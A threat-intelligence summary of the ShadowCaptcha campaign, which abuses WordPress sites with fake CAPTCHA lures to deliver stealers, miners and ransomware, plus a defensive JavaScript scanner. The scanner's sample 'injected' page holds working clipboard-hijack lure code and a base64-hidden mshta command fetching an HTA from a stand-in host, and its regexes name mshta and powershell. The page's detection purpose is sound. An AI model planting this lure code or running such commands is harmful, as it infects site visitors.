ShadowCaptcha Campaign Exploits WordPress Sites for Malware Delivery
Summary
A large-scale cybercrime campaign, codenamed ShadowCaptcha, is using more than 100 compromised WordPress sites to distribute information stealers, ransomware, and cryptocurrency miners. The campaign, detected in August 2025, lures visitors with fake CAPTCHA verification pages (the ClickFix pattern) and social engineering. Its objectives are credential harvesting, illicit cryptocurrency mining, and ransomware deployment. The attacks begin with malicious JavaScript injected into the compromised WordPress sites, which redirects visitors to the fake CAPTCHA pages. From there the chain forks into two paths: one has the victim paste a command into the Windows Run dialog, the other has the victim save and execute an HTML Application (HTA) file. The campaign employs anti-debugging techniques, DLL side-loading, and vulnerable drivers to maintain persistence and improve mining efficiency. The infected sites span various sectors and are located primarily in Australia, Brazil, Italy, Canada, Colombia, and Israel.
Timeline
- 26.08.2025 13:45 (1 article): ShadowCaptcha Campaign Exploits WordPress Sites for Malware Delivery
  Source: ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, thehackernews.com, 26.08.2025 13:45
Information Snippets
All snippets first reported 26.08.2025 13:45 from 1 source, 1 article: ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, thehackernews.com, 26.08.2025 13:45.
- The ShadowCaptcha campaign uses over 100 compromised WordPress sites to distribute malware.
- The campaign uses fake CAPTCHA verification pages and social engineering tactics to infect visitors.
- The primary objectives of ShadowCaptcha are credential harvesting, cryptocurrency mining, and ransomware deployment.
- The attacks begin with malicious JavaScript code injected into compromised WordPress sites.
- The attack chain forks into two paths: one has the victim paste a command into the Windows Run dialog, the other guides the victim to save and execute an HTML Application (HTA) file.
- The campaign employs anti-debugging techniques, DLL side-loading, and vulnerable drivers to maintain persistence and improve mining efficiency.
- The infected sites span various sectors and are located primarily in Australia, Brazil, Italy, Canada, Colombia, and Israel.
- The fake CAPTCHA (ClickFix) page runs obfuscated JavaScript that silently copies a malicious command to the visitor's clipboard; the Run-dialog path of the lure then has the visitor paste and execute it.
- The ShadowCaptcha campaign has been observed delivering an XMRig-based cryptocurrency miner.
- The attackers have been observed dropping a vulnerable driver (bring-your-own-vulnerable-driver, BYOVD) to gain kernel-level access and improve mining efficiency.
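The clipboard-hijack step is the point at which a WordPress operator can catch the injection before any visitor is hit. The following is an added example written for this page, not code from the original article or from the ShadowCaptcha operators: a small static scanner that takes the HTML a site serves, pulls out the inline script bodies, decodes any literal atob("...") payloads so the hidden command becomes visible, and scores ClickFix indicators (clipboard writes, obfuscation helpers, "Win + R" / "Ctrl + V" instructions, LOLBin names such as mshta, CAPTCHA lure text). The indicator list, weights, threshold, the example.invalid URL and both sample pages are constructed for illustration.

```javascript
"use strict";

// Added example for this page (not the article's or the campaign's code): a static
// scanner for ClickFix-style clipboard hijacking in the HTML a WordPress site serves.
// Indicator names, weights, the threshold, the example.invalid URL and both sample
// pages below are constructed for illustration.

const INDICATORS = [
  // [name, pattern, weight]
  ["clipboard_write", /navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*['"]copy['"]\s*\)/i, 4],
  ["obfuscation", /\b(atob|eval|unescape|String\.fromCharCode)\s*\(/, 2],
  ["run_dialog_lure", /\bwin(dows)?\s*(key\s*)?\+\s*r\b|ctrl\s*\+\s*v\b/i, 3],
  ["lolbin_reference", /\b(mshta|powershell|cmd\.exe)\b|\.hta\b/i, 3],
  ["captcha_lure", /verify (that )?you are (a )?human|i'?m not a robot|ray id/i, 1],
];
const SUSPICIOUS_SCORE = 6; // a clipboard write plus one instruction or LOLBin hit

// Return the body of every inline <script>; tags that only carry src= have no body.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) out.push(m[1]);
  }
  return out;
}

// Decode literal atob("...") arguments so a base64-hidden command can be scored too.
function decodedAtobLiterals(js) {
  const out = [];
  const re = /atob\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)/g;
  let m;
  while ((m = re.exec(js)) !== null) {
    out.push(Buffer.from(m[2].replace(/\s+/g, ""), "base64").toString("utf8"));
  }
  return out;
}

// Score one page. Lure text lives in the visible HTML, the clipboard write in a
// script body, and the command itself often only in the decoded payload, so all
// three are searched together; each indicator counts once.
function scanPage(html) {
  const scripts = inlineScripts(html);
  const decoded = scripts.flatMap(decodedAtobLiterals);
  const corpus = [html, ...scripts, ...decoded].join("\n");
  const hits = [];
  let score = 0;
  for (const [name, pattern, weight] of INDICATORS) {
    if (pattern.test(corpus)) {
      hits.push(name);
      score += weight;
    }
  }
  return { score, hits, decoded, suspicious: score >= SUSPICIOUS_SCORE };
}

// Constructed samples: an ordinary WordPress front page, and a page carrying an
// injected ClickFix lure whose command is hidden behind atob().
const CLEAN_PAGE = `<!doctype html><html><head><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>document.addEventListener("DOMContentLoaded", () => { console.log("ready"); });</script>
</head><body><h1>Hello world</h1><p>Welcome to my WordPress blog.</p></body></html>`;

const INJECTED_PAGE = `<!doctype html><html><head><title>Verify you are human</title>
<script>
(function () {
  var c = atob("bXNodGEgaHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdmVyaWZ5Lmh0YQ==");
  document.addEventListener("click", function () { navigator.clipboard.writeText(c); });
})();
</script>
</head><body>
<h2>Verify you are human</h2>
<p>1. Press Win + R&nbsp; 2. Press Ctrl + V&nbsp; 3. Press Enter</p>
<p>Ray ID: 8a1b2c3d</p></body></html>`;

console.log(JSON.stringify(scanPage(INJECTED_PAGE), null, 2));
```

Run it over the HTML an unauthenticated browser actually receives (fetch the front page over HTTP rather than reading the database copy), since the injection in this campaign shows up in the rendered output. A payload assembled from String.fromCharCode or loaded from a remote script src is only partly visible here; fetch the remote body and feed it through scanPage as well.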
Similar Happenings
Axios Abuse and Salty 2FA Kits in Microsoft 365 Phishing Campaigns
Threat actors are leveraging HTTP client tools like Axios and Microsoft's Direct Send feature to execute advanced phishing campaigns targeting Microsoft 365 environments. These campaigns have demonstrated a 70% success rate, bypassing traditional security defenses and exploiting authentication workflows. The attacks began in July 2025 and have targeted executives and managers in various sectors, including finance, healthcare, and manufacturing. The phishing campaigns use compensation-themed lures to trick recipients into opening malicious PDFs containing QR codes that direct users to fake login pages. Additionally, a phishing-as-a-service (PhaaS) offering called Salty2FA is being used to steal Microsoft login credentials and bypass multi-factor authentication (MFA). The Salty2FA kit includes advanced features such as subdomain rotation, dynamic corporate branding, and sophisticated evasion tactics to enhance its effectiveness and evade detection. Salty2FA activity began gaining momentum in June 2025, with early traces possibly dating back to March or April 2025. The campaigns have been active since late July 2025 and continue to this day, generating dozens of fresh analysis sessions daily. Salty2FA targets industries including finance, energy, telecom, healthcare, government, logistics, IT consulting, education, construction, chemicals, industrial manufacturing, real estate, consulting, metallurgy, and more.
MostereRAT Malware Disables Security Tools, Targets Japanese Windows Users
A new malware campaign, tracked as MostereRAT, targets Japanese Windows users with sophisticated evasion techniques. MostereRAT disables antivirus and endpoint defenses, uses an obscure programming language, and abuses legitimate remote access tools to maintain persistent control over compromised systems. The malware's capabilities include privilege escalation, keylogging, data exfiltration, and the creation of hidden administrator accounts. The campaign's long-term objectives and the full extent of its impact remain unclear. MostereRAT employs Easy Programming Language (EPL) to evade detection and uses Windows Filtering Platform (WFP) filters to block security telemetry. The malware deploys legitimate remote access tools like AnyDesk, TigerVNC, and TightVNC, making it difficult to detect. The campaign highlights the importance of removing local administrator privileges and blocking unapproved remote access tools to reduce the attack surface. The malware uses mutual TLS (mTLS) to secure command-and-control (C2) communications and can run as TrustedInstaller, a built-in Windows system account with elevated permissions. MostereRAT can monitor foreground window activity associated with Qianniu - Alibaba's Seller Tool, facilitate RDP logins, and create hidden administrator accounts.
TAG-150 Expands Operations with CastleRAT in Python and C
The threat actor TAG-150, known for CastleLoader malware, has developed a new remote access trojan named CastleRAT. CastleRAT is available in both Python and C variants, and it is used to collect system information, execute commands, and download additional payloads. CastleRAT's development began in March 2025, and it is part of a multi-tiered infrastructure used by TAG-150. The malware is distributed through phishing attacks, fraudulent GitHub repositories, and other methods. The Python variant, also known as PyNightshade, and the C variant have different capabilities. The C variant includes keylogging, screenshot capture, file upload/download, and cryptocurrency clipper functionality. CastleRAT uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. TAG-150 has been active since at least March 2025, using CastleLoader as an initial access vector for various secondary payloads, including remote access trojans, information stealers, and other loaders. TAG-150's operations have targeted critical infrastructure, including U.S. government agencies, and have been linked to a Play Ransomware attack against a French organization. The group's MaaS operation is likely promoted within closed circles, indicating a sophisticated and connected user base. TAG-150 is likely to develop and release additional malware in the near term and expand its distribution efforts.
SVG Files Used to Deploy Phishing Pages in Colombian Judicial System Impersonation Campaign
A malware campaign leveraging SVG files to deploy Base64-encoded phishing pages impersonating the Colombian judicial system has been identified. The SVG files, distributed via email, execute JavaScript payloads to inject phishing pages and download ZIP archives. The campaign involves 523 unique SVG files that have evaded detection by antivirus engines. The earliest sample dates back to August 14, 2025. The campaign illustrates the evolving tactics threat actors use to bypass security measures. The same reporting notes broader trends in threats targeting macOS systems with information stealers like Atomic macOS Stealer (AMOS), and threats targeting gamers.
GhostRedirector Compromises 65 Windows Servers Using Rungan Backdoor and Gamshen IIS Module
GhostRedirector, a previously undocumented threat cluster, has compromised at least 65 Windows servers primarily in Brazil, Thailand, and Vietnam. The attacks, active since at least August 2024, deployed the Rungan backdoor and Gamshen IIS module. Rungan executes commands on compromised servers, while Gamshen manipulates search engine results for SEO fraud. The threat actor targets various sectors, including education, healthcare, technology, transportation, insurance, and retail, using SQL injection vulnerabilities for initial access. The group is assessed with medium confidence to be China-aligned. The operation involves using PowerShell to download malware tools and exploits like EfsPotato and BadPotato for privilege escalation.